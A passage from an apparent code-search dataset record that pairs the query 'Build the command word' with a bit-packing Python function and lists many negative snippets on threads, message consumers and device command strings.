target=self.sock.start_listening, daemon=True)\n listening_thread.start()\n sending_thread = Thread(target=self.sock.start_sending, daemon=True)\n sending_thread.start()\n\n ack_watch_thread = Thread(target=self.watch_for_acks, daemon=True)\n ack_watch_thread.start()\n\n ack_timeout_thread = Thread(\n target=self.watch_for_ack_timeout, daemon=True)\n ack_timeout_thread.start()\n\n self.report()", "def create_listen_thread(self):\n self.listen_thread = threading.Thread(target=self.listen, daemon=True)\n self.listen_thread.start()\n print('Started listener thread')", "def start(self):\n self.sender.start()\n self.receiver.start()", "def start(self):\n self.sender.start()\n self.receiver.start()", "def start_consuming(self):\n self.logger.debug(\"Issuing consumer related RPC commands\")\n\n self._channel.basic_qos(prefetch_count=self._max_concurrent)\n self._channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\n consume_kwargs = {\"queue\": self._queue_name}\n if PIKA_ONE:\n consume_kwargs[\"on_message_callback\"] = self.on_message\n else:\n consume_kwargs[\"consumer_callback\"] = self.on_message\n\n self._consumer_tag = self._channel.basic_consume(**consume_kwargs)", "def startReceiving(self):\n self.listening = True\n self.start()", "def _begin_consuming(self):\n self._consuming = True\n loop = asyncio.get_event_loop()\n self._message_queue = asyncio.Queue(\n maxsize=self.app.settings['SQS_PREFETCH_LIMIT'],\n loop=loop,\n )\n loop.create_task(self._consume())", "def start(self):\n self.stop_recognising.clear()\n self.thread.start()", "def run(self):\n while True:\n msg = self.recv()", "def stdin_thread(self):\n while True:\n if not self.is_running():\n time.sleep(0.1)\n continue\n msg = self._stdin_queue.get()\n if msg is None:\n break # Ask to stop\n self._say(msg)", "def start(self) -> None:\n conn_manager = ConnectionManager(broker_host=self.broker_host, queue=self.queue)\n channel = conn_manager.start_channel()\n channel.basic_consume(queue=self.queue, on_message_callback=self.callback)\n\n try:\n print(\"PV Simulator...\")\n channel.start_consuming()\n except KeyboardInterrupt:\n pass", "def connect_thread(self, *args, **kwargs):\r\n thread = threading.Thread(target=self.connect_stream, args=args, kwargs=kwargs)\r\n thread.daemon = True\r\n thread.start()\r\n return thread", "def run(self):\n self.thread = threading.Thread(target=self._main)\n self.thread.start()\n self.running = True", "def start(self):\n\n # Start listening for records\n self._run_loop(True)\n # There might still be records in the queue.\n self._run_loop(False)", "def _start_loop(self):\n self.p = tread.Thread(target=self._loop)\n self.p.start()", "def run(self):\n self.listen(self.input_topics.filter_by(transmission='tcp'))\n\n logging.info('Getting into the listening loop')\n self.running = True\n while self.running:\n self.loop()", "def start(self):\n self.socket_manager.start()\n\n if self.poc != None:\n self._start_thread(self.contact_poc, daemon=True)\n self.send_discovery_message(self.poc)\n self._start_thread(self.watch_for_discovery_messages, daemon=True)\n self._start_thread(self.watch_for_heartbeat_messages, daemon=True)\n self._start_thread(self.send_heartbeat_messages, daemon=True)\n self._start_thread(self.watch_for_heartbeat_timeouts, daemon=True)\n self._start_thread(self.watch_for_rtt_messages, daemon=True)\n self._start_thread(self.calculate_rtt_timer, daemon=True)\n self._start_thread(self.watch_for_app_messages, daemon=True)\n\n while True: # Blocking. Nothing can go below this\n self.check_for_inactivity()", "def start(self):\n return self._thread.start()", "def start(self) -> None:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n self.wserver = websockets.serve(self.__producer_handler, port=self.port, loop=loop)\n try:\n # run server forever\n self.server = asyncio.get_event_loop()\n self.server.run_until_complete(self.wserver)\n self.server.run_forever()\n except Exception:\n self.close()\n\n loop.run_forever()", "def on_run(self):\n wxMediator.on_run(self)\n listener_evt = InterThreadEventWX(self,\n wxEVT_NEW_LISTEN_CONN) \n talker_evt = InterThreadEventWX(self,\n wxEVT_NEW_TALK_CONN) \n server = self.server()\n sys.stderr.write('Starting server threads...\\n')\n sys.stderr.flush()\n server.start_other_threads(listener_evt, talker_evt)", "def start(self, receive_callback):\n if self.socket is not None:\n Thread(target = self._send).start()\n Thread(target = self._receive, args = (receive_callback,)).start()", "def receive_incoming_messages_thread(self):\n\n def on_error(partition_context, error):\n logger.error(\"EventHub on_error: {}\".format(str(error) or type(error)))\n\n def on_partition_initialize(partition_context):\n logger.warning(\"EventHub on_partition_initialize\")\n\n def on_partition_close(partition_context, reason):\n logger.warning(\"EventHub on_partition_close: {}\".format(reason))\n\n def on_event(partition_context, event):\n reset_watchdog()\n if event:\n self.executor.submit(self.dispatch_incoming_message, event)\n\n logger.info(\"Starting EventHub receive\")\n with self.eventhub_consumer_client:\n self.eventhub_consumer_client.receive(\n on_event,\n on_error=on_error,\n on_partition_initialize=on_partition_initialize,\n on_partition_close=on_partition_close,\n max_wait_time=30,\n )", "def start(self):\n self.stream.start()\n self.running = True\n self.update()", "def start(self):\n\n self.keep_running = True # Set running flag to true\n self.th = threading.Thread(target=self.listenSocket)\n self.th.daemon = True # Thread will terminate with the main\n self.th.start()\n self.th.join(0)", "def run(self):\n self.logger.info(\"Starting messenger.\")\n self.recv()", "def run(self):\n\n self.make_connection()\n self.channel()\n self.declare_queue()\n self.publish_message()\n self.close_connection()", "def run(self):\n self.logger.info(\"starting Dashi consumer\")\n while not self.shutdown:\n self.rpc.listen()", "def _run_monitor_thread(self):\n while True:\n chunk = self.stream.read(1024)\n if not chunk:\n # EOF - subprocess has exited, so trigger shutdown\n trigger_exit(ExitMode.CHILD)\n break\n self.output_deque.appendleft(chunk)", "def starting(self):\n ident = self.ident()\n print('{} starting & consuming \"{}\".'.format(ident, self.to_consume))\n\n if self.max_tasks:\n print('{} will die after {} tasks.'.format(ident, self.max_tasks))\n else:\n print('{} will never die.'.format(ident))", "def start(self) -> None:\n self.should_exit = False\n self._main_thread = threading.Thread(target=self._wrap_start, daemon=True)\n self._main_thread.start()", "def start_socket_thread(self):\n self.socket_thread = BCPServer(self, self.receive_queue,\n self.sending_queue)\n self.socket_thread.daemon = True\n self.socket_thread.start()", "def run(self):\n t = threading.Thread(target=self._thread_action,\n args=(self._sensor_queue,))\n t.daemon = True\n t.start()", "def run(self):\n while True:\n line = self.stream.readline()\n if not len(line):\n # EOF, stop!\n break\n else:\n # Put the text on the queue, along with the time it was read.\n self.callback_queue.put(line)", "def start(self):\n self._do_work.set()\n self._worker_thread.start()", "def run(self):\n if self.init():\n while not self._stop.value:\n try:\n sockets = dict(self.poll.poll(100))\n if (self.sock_reply in sockets and\n sockets[self.sock_reply] == zmq.POLLIN):\n request = self.sock_reply.recv_multipart()\n # do some 'work', update status\n cmd = loads(request[0])\n self.running = 1\n self.coroutine.run(cmd)\n self.running = 0\n self.nb_job_done += 1\n # send reply back to router/queuer\n self.sock_reply.send_multipart(request)\n\n except Exception as e:\n self.log.error('CONSUMER exception {}'.format(e))\n break\n self.sock_reply.close()\n self.finish()\n self.done = True", "def join(self):\n self.consumer.pause()\n try:\n self.consumer.join()\n # This can raise if the consumer thread was never started\n except RuntimeError:\n pass", "def start(self, file_service):\n self.is_reading_lock = threading.Lock()\n self.read_thread = threading.Thread(\n target=self._read, args=(file_service,))\n self.read_thread.start()", "def message_handler(self, msg):\n thread = threading.Thread(target=self.answer, args=(msg,))\n thread.start()\n return thread", "def run(self):\n\n\t\t#Begin running the clientHandler\n\t\tself.running = True\n\t\tself.rxThread.start()\n\n\t\twhile self.running:\n\t\t\ttime.sleep(0.1)\n\t\n\t\t\t#Keep a count of the number of missing Hello requests, over 5 kill client\n\t\t\tif self.missingCount >= 5:\n\t\t\t\tself.running = False", "def start(self):\n state_thread = threading.Thread(target=self._parse_block_queue)\n state_thread.daemon = True\n state_thread.start()", "def __init__(self, stream):\n self.stream = stream\n self.queue = Queue()\n self.start_thread()", "def start(self):\n self.capturing = True\n print \"Connecting Sender\"\n self.sock.connect(self.addr)\n self.capture_thread.start()\n print \"Starting Sender\"\n self.sending_thread.start()", "def run(self):\n self.log.info(\"Starting thread: \" + self.name)\n self.object__ = self.run_process(self.object__, self.args)", "def run(self):\n while True:\n # Check to see if we should stop\n if self._stop.isSet():\n logger.debug(\"Worker thread stopping.\")\n break\n\n # Try to pull from the queue\n try:\n func, args, kwargs = self.queue.get_nowait()\n func(*args, **kwargs)\n except Queue.Empty:\n time.sleep(5)\n continue\n except Exception as e:\n logger.exception(e)", "def background(self):\n self.thread = threading.Thread(target=self.run)\n self.thread.setDaemon(True)\n self.thread.start()", "def start(self, *args, **kwargs):\n\n self.queue = Queue()\n thread = Thread(target=self._threaded, args=args, kwargs=kwargs)\n thread.start()\n\n return Asynchronous.Result(self.queue, thread)", "def _start_receive_from_queue(self):\n while True:\n received_message = recv_msg(self.TCPSock)\n # received_message = self.TCPSock.recv(self.buf)\n if self.verbose: print \"Server sends: \" + received_message\n self.receive_message_queue.put(received_message)", "def run(self):\n watcher = self._watcher(self.on_recv)\n watcher.loop()", "def work(self):\n while True:\n message = self.get()\n self.handle(message)", "def start_work(self):\n self.worker_thread = WorkerThread(self.feedback_log, self.job_list) # only created when processing begins. May be recreated\n self.worker_thread.daemon = True\n self.worker_thread.start()", "def startMP(self):\n for w in self.consumers:\n w.start()", "def Start(self):\n for unused_i in range(0, self.args.message_count):\n self.CallClient(\n standard.ReadBuffer, offset=0, length=100, next_state=\"Process\")", "def start_thread():\n global gIt, gOt, gRunning\n gRunning = True\n gIt = Thread(target = input_thread)\n gIt.start()\n gOt = Thread(target = output_thread)\n gOt.start()", "def start(self):\r\n thread = threading.Thread(target=self.run)\r\n try:\r\n thread.start()\r\n except RuntimeError as e:\r\n raise SchedulerError(f\"Failed to start worker '{self.WORKER_ID}': \" + str(e))", "def listen(self):\n print \"starting server thread with address \" + str(self.address)\n server_thread = ServerThread(self.address, self.response_queue, self.queue_lock, self.on_message_received)\n server_thread.start()\n self.connected_as_server = True # TODO only if successful", "def run(self) -> None:\n with ThreadPoolExecutor(max_workers=self.maxworkers) as ex:\n ex.submit(self._producer)\n ex.submit(self._consumer)\n self._q.join()", "def start_consuming(self):\n\n for queue in self._handlers.keys():\n self._consumer_tags += self._channel.basic_consume(self.on_message,\n queue=queue)", "def _ensure_thread(self) -> None:\n\n if not self._thread:\n thread = self._thread_factory(self.run)\n self._thread = thread\n thread.start()", "def run(self):\n try:\n\n self._connection = self.connect()\n self._connection.ioloop.start()\n except (KeyboardInterrupt, SystemExit):\n self.stop()\n except Exception as e:\n logger.warn(\"Exception: %s\", str(e))\n logger.warn(\"Exception caught on rabbit consumer for process: %s with consumer id %s\", threading.current_thread, str(self.consumer_id))\n self.internal_error_queue.put(self.consumer_id)" ]
[ "0.71411765", "0.6965287", "0.68307364", "0.6813745", "0.6759223", "0.66143614", "0.65682524", "0.6550619", "0.65052104", "0.64535457", "0.6452136", "0.6439701", "0.6390061", "0.63585454", "0.6282679", "0.6282162", "0.62618804", "0.6250061", "0.6245712", "0.6242766", "0.622399", "0.6206326", "0.6204722", "0.6193995", "0.6181676", "0.6163639", "0.6150385", "0.61503434", "0.6138435", "0.6129089", "0.6128222", "0.61251795", "0.6116055", "0.61088544", "0.6097712", "0.60808325", "0.60762924", "0.60756946", "0.605868", "0.6048956", "0.6046768", "0.6046507", "0.6033856", "0.6033352", "0.6027065", "0.6027065", "0.60226953", "0.6015154", "0.6013997", "0.59925014", "0.59849495", "0.59828776", "0.5979823", "0.5975299", "0.5973039", "0.59724534", "0.59717244", "0.59460646", "0.5934322", "0.5907122", "0.587836", "0.5877566", "0.5874615", "0.58597827", "0.58594173", "0.58568466", "0.5854173", "0.5846509", "0.5829034", "0.5827151", "0.582091", "0.58202505", "0.5819243", "0.5818565", "0.5802302", "0.57993823", "0.579789", "0.57921237", "0.57908684", "0.577979", "0.5778772", "0.577145", "0.576162", "0.5738855", "0.57302797", "0.5719021", "0.57096756", "0.5707352", "0.57046807", "0.5703478", "0.5697589", "0.5690435", "0.5679775", "0.56684136", "0.56445885", "0.56428826", "0.56262416", "0.5625848", "0.56195116", "0.56108665", "0.560908" ]
0.0
-1
Build the command word. Note
def get_cmd_word(cmd, d_width, d_length): word = 0x1 # cmd valid word = word | (d_width - 1) << 1 # cmd dataWidth (3->4B, 1->2B, 0->1B) word = word | cmd << 3 # cmd type (1->RD, 0->WR) word = word | d_length << 8 # cmd burst length (1->1 word) word = word | 0 << 16 # unused return word
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _build_command(self, cmd, unit):\n return '#' + unit + cmd + NEWLINE", "def _build_simple_command(self, cmd):\n return cmd+SBE37_NEWLINE", "def _build_direct_command(self, cmd, arg):\n return \"%s%s\" % (arg, self._newline)", "def _buildCmd(self, cmd, cmdArg=0x00):\n res = [cmd, cmdArg]\n if self.USE_SUFFIX:\n return res + [self.CMD_SUFFIX]\n return res", "def build_command_string(self):\n if self._regex_helper.search_compiled(W._re_h, self.options):\n if self._regex_helper.group(\"SOLO\"):\n self.options = self.options.replace('-h', '')\n else:\n self.options = self.options.replace('h', '')\n\n cmd = \"{} {}\".format(\"w\", self.options)\n else:\n cmd = \"{}\".format(\"w\")\n return cmd", "def _build_solo_command(self, cmd):\n return COMMAND_CHAR[cmd]", "def _build_command(self, command_name, hardware_address = '', comp_var_dict = None):\n # Start command adn set name\n command = \"<Command><Name>{command_name}</Name>\".format(command_name=command_name)\n\n if hardware_address:\n command += \"<DeviceDetails><HardwareAddress>{hardware_address}</HardwareAddress></DeviceDetails>\".format(hardware_address=hardware_address)\n\n if comp_var_dict is not None:\n comp_keys = comp_var_dict.keys()\n if len(comp_keys) > 0:\n for comp_key in comp_keys:\n # Build requested variable list\n command += \"<Components><Component><Name>{comp_key}</Name><Variables>\".format(comp_key=comp_key)\n variables = comp_var_dict[comp_key]\n for var in variables:\n command += \"<Variable><Name>{var}</Name></Variable>\".format(var=var)\n command += \"</Variables></Component></Components>\"\n else:\n # Request all variables from all components\n command += \"<Components><All>Y</All></Components>\"\n\n # Close command\n command += \"</Command>\"\n \n return command", "def buildCmd( tcmpCmd, cmd, target, sequence, fieldList):\n cmdList = [tcmpCmd, cmd, target, sequence, fieldList]\n\n return \"<{cmd}>\".format(cmd=\":\".join(cmdList))", "def command_create(self):\n command = []\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['pre_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n command.extend(self.pre_chth)\n command.append(Template('@CMD_BEGIN@ $short_name').substitute(self.shell_dict))\n command.extend(self.tool_chth)\n for macro in self.my_xml.tool_data[self.shell_dict['short_name']]['post_tmpls']:\n command.append(self.my_xml.chth_tmpl.substitute(macro=macro))\n\n return '\\n'.join(command)", "def _build_menu_command(self, cmd):\n if COMMAND_CHAR[cmd]:\n return COMMAND_CHAR[cmd]+self._newline\n else:\n raise InstrumentProtocolException(\"Unknown command character for %s\" % cmd)", "def buildCommand(self, kwargs):\r\n self.command = \"\"\r\n try:\r\n if not self.isEnabled():\r\n return\r\n except Exception, e:\r\n print \"<ERROR>\", e\r\n return\r\n self.command = self.app\r\n \r\n \r\n \r\n # filename should be last in the command, so iterate again\r\n for key in kwargs:\r\n if key == 'filename':\r\n if type(kwargs[key]) == str:\r\n f = kwargs[key]\r\n if os.path.exists(f):\r\n self.command += \" \" + str(f)\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File does not exist!\"\r\n else:\r\n self.command = \"\"\r\n raise Exception, \"File needs to be a string.\"", "def __cmd_builder(self):\n self.cmd = 'python -m lizard \"%s\" ' % self.get_proj_path()\n args = \"\"\n if self.get_cyclo_args():\n args = self.get_cyclo_args()\n exclude = \",\".join(str(x) for x in self.get_cyclo_exclude() if x is not None)\n if exclude:\n exclude = ','.join(' -x \"{0}\"'.format(w) for w in exclude.rstrip().split(','))\n self.cmd = self.cmd + args + \" \" + exclude + \" --csv\"\n print(self.cmd) # pragma: no mutate", "def buildCommandModel ( switchSpecs, posSpecs ):\n\n #-- 1 --\n result = []\n\n #-- 2 --\n # [ result +:= strings representing the options in switchSpecs ]\n for switch in switchSpecs:\n result.append ( \"-%s\" % switch.letter )\n\n #-- 3 --\n # [ result +:= strings representing the keys in posSpecs ]\n for pos in posSpecs:\n if pos.optional:\n result.append ( \"[%s]\" % pos.key )\n else:\n result.append ( pos.key )\n if pos.repeated:\n result.append ( \"...\" )\n\n #-- 4 --\n # [ return the concatenation of the strings in result with single\n # spaces between them ]\n return \" \".join ( result )", "def generate_command_string(self, operation, *args, **kwargs):\n cmd = [self.terraform_binary_path, operation]\n\n for key, value in kwargs.items():\n if key == \"var\":\n for varkey, varval in value.items():\n option = \"-var=\"\n option += \"'%s=%s'\" % (varkey, varval)\n cmd.append(option)\n else:\n option = \"\"\n if \"_\" in key:\n key = key.replace(\"_\", \"-\")\n\n if value == \"IsFlag\":\n option = \"-%s\" % key\n else:\n option = \"-%s=%s\" % (key, value)\n cmd.append(option)\n\n if len(args) > 0:\n for arg in args:\n cmd.append(arg)\n\n return \" \".join(cmd)", "def build_command(self) -> typing.Optional[str]:\n return self._values.get(\"build_command\")", "def build_command(self) -> typing.Optional[str]:\n return self._values.get(\"build_command\")", "def build_command(self) -> typing.Optional[str]:\n return self._values.get(\"build_command\")", "def _build_send_optode_command(self, cmd, command):\n return \"%s=%s%s\" % (cmd, command, self._newline)", "def _BuildCommand(self, command_name, parameter_files=None, **kwargs):\n command = [YCSB_EXE, command_name, self.database]\n\n parameters = self.parameters.copy()\n parameters.update(kwargs)\n\n # Adding -s prints status which includes average throughput per sec.\n if _THROUGHPUT_TIME_SERIES.value and command_name == 'run':\n command.append('-s')\n parameters['status.interval'] = _STATUS_INTERVAL_SEC\n\n # These are passed as flags rather than properties, so they\n # are handled differently.\n for flag in self.FLAG_ATTRIBUTES:\n value = parameters.pop(flag, None)\n if value is not None:\n command.extend(('-{0}'.format(flag), str(value)))\n\n for param_file in list(self.parameter_files) + list(parameter_files or []):\n command.extend(('-P', param_file))\n\n for parameter, value in parameters.items():\n command.extend(('-p', '{0}={1}'.format(parameter, value)))\n\n return 'cd %s && %s' % (YCSB_DIR, ' '.join(command))", "def makecmd(self, options):", "def gen_command(process):\n cmd = \"{} \".format(process.name)\n for o in process.options.opt_list:\n i = 0\n opt = \"\"\n for el in o: \n if el and el != \"input\" and el != \"output\" and i != 3:\n opt += str(el)\n if opt[-1] != \"=\" and opt[-1] != \"'\": # command without space\n opt += \" \" # space\n i += 1\n cmd += opt\n return cmd", "def _build_command(self, code_command):\n if code_command == 'end':\n return roboc_command.RobocCommandExit()\n elif code_command[0] == 'E':\n return roboc_command.RobocMoveEast(int(code_command[1:]))\n elif code_command[0] == 'W':\n return roboc_command.RobocMoveWest(int(code_command[1:]))\n elif code_command[0] == 'S':\n return roboc_command.RobocMoveSouth(int(code_command[1:]))\n elif code_command[0] == 'N':\n return roboc_command.RobocMoveNorth(int(code_command[1:]))\n else:\n print(code_command)\n raise ValueError()", "def _build_command_prelude(class_number, verb):\n return struct.pack(\"<II\", class_number, verb)", "def _cmd_builder(self, test_config):\n arg_str = ''\n for key, value in sorted(test_config['args'].items()):\n arg_str += '--{} {} '.format(key, value)\n return test_config['pycmd'].format(arg_str)", "def _create_cmd(self):\n comment = (\"#------------------\\n\"\n \"# Install FSL {}\\n\"\n \"#------------------\".format(self.version))\n if self.use_binaries:\n url = self._get_binaries_url()\n cmd = self.install_binaries(url)\n elif self.use_installer:\n cmd = self.install_with_pyinstaller(self.check_urls)\n return \"\\n\".join((comment, cmd))", "def build(self, origin, token, args):\r\n # If the last argument is \"long\", package it for sending\r\n if len(args) > 0:\r\n if args[-1].find(\" \") > -1:\r\n build_last_arg = \":\" + args[-1]\r\n build_args = args[0:-1] + build_last_arg.split(\" \")\r\n else:\r\n build_args = args\r\n else:\r\n build_args = []\r\n # Build the line\r\n # Future compatibility - only send \\n\r\n ret = create_numeric(origin) + \" \" + token + \" \" \\\r\n + \" \".join(build_args) + \"\\n\"\r\n \r\n # Check we're not sending things which are protocol violations\r\n if len(ret) > 512:\r\n raise ProtocolError('Line too long to send')\r\n if not token.isupper() and not token.isdigit():\r\n raise ProtocolError('Command not in uppercase during build')\r\n \r\n return ret", "def __build_cmd(self, infname, outdir):\n self._outdirname = os.path.join(outdir, \"trimmomatic_output\")\n cmd = [\"trimmomatic\",\n infname,\n \"-o\", self._outdirname]\n self._cmd = ' '.join(cmd)", "def command_and_args(self) -> str:\n if self.command and self.args:\n rtn = f'{self.command} {self.args}'\n elif self.command:\n # there were no arguments to the command\n rtn = self.command\n else:\n rtn = ''\n return rtn", "def cmdify(self):\n return \" \".join(\n itertools.chain(\n [_quote_if_contains(self.command, r\"[\\s^()]\")],\n (_quote_if_contains(arg, r\"[\\s^]\") for arg in self.args),\n )\n )", "def _get_cmd(cls, command, f_config, verbose=False):\n if command not in cls.COMMANDS:\n raise KeyError('Could not recongize command \"{}\". '\n 'Available commands are: {}'\n .format(command, cls.COMMANDS))\n cmd = cls.CMD_BASE.format(fp_config=f_config, command=command)\n if verbose:\n cmd += ' -v'\n\n return cmd", "def command(self):\n return (self.command_).format(self.x)", "def cmd(self):", "def genCommand(char, command): \n \n if char == 'a':\n command = SModelRobotOutput();\n command.rACT = 1\n command.rGTO = 1\n command.rSPA = 255\n command.rFRA = 150\n\n if char == 'r':\n command = SModelRobotOutput();\n command.rACT = 0\n\n if char == 'c':\n command.rPRA = 255\n\n if char == 'o':\n command.rPRA = 0\n\n if char == 'b':\n command.rMOD = 0\n \n if char == 'p':\n command.rMOD = 1\n \n if char == 'w':\n command.rMOD = 2\n \n if char == 's':\n command.rMOD = 3\n\n #If the command entered is a int, assign this value to rPRA\n try: \n command.rPRA = int(char)\n if command.rPRA > 255:\n command.rPRA = 255\n if command.rPRA < 0:\n command.rPRA = 0\n except ValueError:\n pass \n \n if char == 'f':\n command.rSPA += 25\n if command.rSPA > 255:\n command.rSPA = 255\n \n if char == 'l':\n command.rSPA -= 25\n if command.rSPA < 0:\n command.rSPA = 0\n\n \n if char == 'i':\n command.rFRA += 25\n if command.rFRA > 255:\n command.rFRA = 255\n \n if char == 'd':\n command.rFRA -= 25\n if command.rFRA < 0:\n command.rFRA = 0\n\n return command", "def gen_build_str_def():\n\treturn \"\"", "def GenerateABCmd(self):\n \n\treturn self.ABGlobal.JavaPath + self.ABGlobal.ABJar + \"; ab.Ab \" + \" -ipServer \"+ self.ABGlobal.ServerIP + \" -ip \" + self.BadgeIP \\\n\t + \" -cmd \" + self.ABGlobal.TemABFile + \" -out \" + self.AbLogName + \" -dir \" + self.ABGlobal.ABHome + \" -log 5 -wavdir \" + \\\n\t self.ABGlobal.WavDirPATH + self.ABGlobal.ApMac + \" -mac \"+self.DeviceMac+\" -rtp \" # \" -logout\" ", "def genCommand(self,char, command): \n\t\t\n\t\tif char == 'a':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 1\n\t\t\tcommand.rGTO = 1\n\t\t\tcommand.rSP = 255\n\t\t\tcommand.rFR = 150\n\n\t\tif char == 'r':\n\t\t\tcommand = outputMsg.Robotiq2FGripper_robot_output();\n\t\t\tcommand.rACT = 0\n\n\t\tif char == 'c':\n\t\t\tcommand.rPR = 255\n\n\t\tif char == 'o':\n\t\t\tcommand.rPR = 0 \n\n\t\t#If the command entered is a int, assign this value to rPRA\n\t\ttry: \n\t\t\tcommand.rPR = int(char)\n\t\t\tif command.rPR > 255:\n\t\t\t\tcommand.rPR = 255\n\t\t\tif command.rPR < 0:\n\t\t\t\tcommand.rPR = 0\n\t\texcept ValueError:\n\t\t\tpass \n\t\t\t\n\t\tif char == 'f':\n\t\t\tcommand.rSP += 25\n\t\t\tif command.rSP > 255:\n\t\t\t\tcommand.rSP = 255\n\t\t\t\t\n\t\tif char == 'l':\n\t\t\tcommand.rSP -= 25\n\t\t\tif command.rSP < 0:\n\t\t\t\tcommand.rSP = 0\n\n\t\t\t\t\n\t\tif char == 'i':\n\t\t\tcommand.rFR += 25\n\t\t\tif command.rFR > 255:\n\t\t\t\tcommand.rFR = 255\n\t\t\t\t\n\t\tif char == 'd':\n\t\t\tcommand.rFR -= 25\n\t\t\tif command.rFR < 0:\n\t\t\t\tcommand.rFR = 0\n\n\t\treturn command", "def _build_cmdline (self, *clargs):\n\t\t#MSG (clargs)\n\t\tclargs = list (clargs) + [INSEQ_FILENAME]\n\t\t#MSG (clargs)\n\t\tcmdline = clineapp.ClineApp._build_cmdline (self, *clargs)\n\t\tcmdline += ' > %s' % OUTALIGN_FILENAME\n\t\t#MSG (cmdline)\n\t\treturn cmdline", "def compile(self) -> str:\n compiled_command = (\n f\"{PUMP_ADDRESS[self.target_pump_num]}\"\n f\"{self.target_syringe}\"\n f\"{self.command}{self.command_value}\"\n )\n\n if self.parameter_value:\n compiled_command += f\"{self.optional_parameter}{self.parameter_value}\"\n\n return compiled_command + self.execution_command", "def buildCommand(self, player, game, json):", "def build(_):", "def rebuild_command(args):\n return \"%s\\n\" % (\" \".join(args)).replace(\"\\\\\", \"\\\\\\\\\")", "def label(cmd):\r\n cmd = cmd.replace('make][.DP', 'make1][.NP')\r\n cmd = cmd.replace('make][.SC', 'make2][.SC')\r\n cmd = re.sub('(draw.*)one','\\\\1one1',cmd)\r\n cmd = re.sub('(make1.*)one','\\\\1one1',cmd)\r\n cmd = re.sub('(make2.*)one','\\\\1one2',cmd)\r\n cmd = re.sub('(move.*)one','\\\\1one2',cmd)\r\n cmd = re.sub('(hide.*)one','\\\\1one2',cmd)\r\n cmd = '[result ' + cmd + ']' #dummy function for plop\r\n return cmd", "def _commandTemplate(self, command:dict) -> ET.Element:\n\t\tresult = ET.Element('Command')\n\t\tfor key,value in command.items():\n\t\t\tET.SubElement(result,key).text = value\n\t\treturn result", "def gen_build_str_dec():\n\t#Get name of person building firmware\n\t#git config --get-all user.name\n\t#Get repo revision\n\t#git log | head -1 | cut -d \" \" -f 2\n\t#Get branch\n\t#git branch | grep \"\\*\" | cut -d \" \" -f 2\n\t#Get modified status\n\t#Date, time, gcc version (__VERSION__)\n\ts = \"Miniboard Firmware rev \"\n\treturn \"\"", "def build_message(cmd, data):\r\n\tif len(cmd) > CMD_FIELD_LENGTH or len(data) > MAX_DATA_LENGTH:\r\n\t\treturn None\r\n\tfull_cmd = cmd + \" \"*(CMD_FIELD_LENGTH-len(cmd))\r\n\tdata_len = str(len(data))\r\n\tfull_data_len = \"0\"*(LENGTH_FIELD_LENGTH-len(data_len))+data_len\r\n\tfull_msg = DELIMITER.join([full_cmd, full_data_len, data])\r\n\treturn full_msg", "def __build_command_string(self, cmd):\n cmd_string = cmd.command\n\n # if we know the number of frames that this command returns,\n # only wait for exactly that number. This avoids some harsh\n # timeouts from the ELM, thus speeding up queries.\n\n\n return cmd_string", "def build_command_depricated(device_dict, command_tuple):\n command = \" \" # The final command which should be send in the end\n return_list = [] # Is list of commands which can be returned if need be\n only_command = False # Flag if only a command was passed, important if such a command doesnt need syntax!\n\n if (\n type(command_tuple) == type(u\"Unicode\")\n or type(command_tuple) == str\n or type(command_tuple) == float\n or type(command_tuple) == int\n ):\n command_tuple = (str(command_tuple), \"\") # so only tuple are now prevelent\n only_command = True\n elif type(command_tuple[1]) == list:\n command_tuple = (\n command_tuple[0],\n [str(x) for x in command_tuple[1]],\n ) # so no unicode is present\n\n # Preparations\n # look for a syntax (paranteses and so on)\n if \"syntax\" in device_dict:\n syntax = str(device_dict[\"syntax\"])\n syntax = syntax.split(\"###\")\n if not syntax[0]:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n else:\n syntax = [\"\", \"\"] # Most devices have no paranteses or whatsoever\n\n # Looks if a separator is needed to sepatare mulitple orders\n if \"separator\" in device_dict:\n sepa = str(device_dict[\"separator\"])\n else:\n sepa = \" \" # This should be the standard for most devices\n\n if command_tuple[0] in device_dict:\n # here all the magic happens\n # First look if the order is swichted or not (command value, or value command)\n\n # Check if multiple commands so list or so\n if type(device_dict[command_tuple[0]]) == str or type(\n device_dict[command_tuple[0]]\n ) == type(u\"Unicode\"):\n command_list = [device_dict[command_tuple[0]]]\n else:\n command_list = device_dict[command_tuple[0]]\n\n for command_item in command_list:\n command_item = str(command_item)\n command = \"\"\n\n # Value -> Command\n if int(device_dict.get(\"command_order\", 1)) == -1:\n # Now look if a csv structure is necessary for the command to work\n start_ind = command_tuple[0].find(\n \"_\"\n ) # finds the index of the command, to search for\n if (\n \"CSV\" + command_tuple[0][start_ind:] in device_dict\n ): # looks if an actual csv-command is there\n # Todo: test CSV command\n csv_commands = device_dict[\n \"CSV\" + str(command_tuple[0])[start_ind:]\n ]\n csv_commands = (\n csv_commands.strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n ) # get rid of some caracters which should not be there\n csv_commands = csv_commands.split(\n \",\"\n ) # now split it for easy access\n\n # Make sure you always got a list of the next commandblock will fail\n if (\n type(command_tuple[1]) == list\n or type(command_tuple[1]) == tuple\n ):\n value_list = command_tuple[1]\n elif type(command_tuple[1]) == str or type(command_tuple) == type(\n u\"Unicode\"\n ):\n value_list = (\n command_tuple[1]\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n .replace(\" \", \"\")\n )\n value_list = value_list.split(\",\")\n\n csv_list = (\n \",\".join(map(str, value_list))\n .strip()\n .strip(\"(\")\n .strip(\")\")\n .strip(\"[\")\n .strip(\"]\")\n .strip()\n )\n csv_list = csv_list.split(\",\")\n\n for i, com in enumerate(csv_list):\n # here the input will be checked if enough parameters are passed for this command.\n # If not a 0 will be entered and a warning will be printed\n command += str(csv_list[i]).strip() + sepa\n\n if i + 1 < len(csv_commands) and len(csv_commands) > 1:\n for j in range(\n i + 1, len(csv_commands)\n ): # Fill the rest of the missing paramters\n l.error(\n \"Warning: Not enough parameters passed for function: \"\n + str(command_item)\n + \" the command must consist of \"\n + str(csv_commands)\n + \" 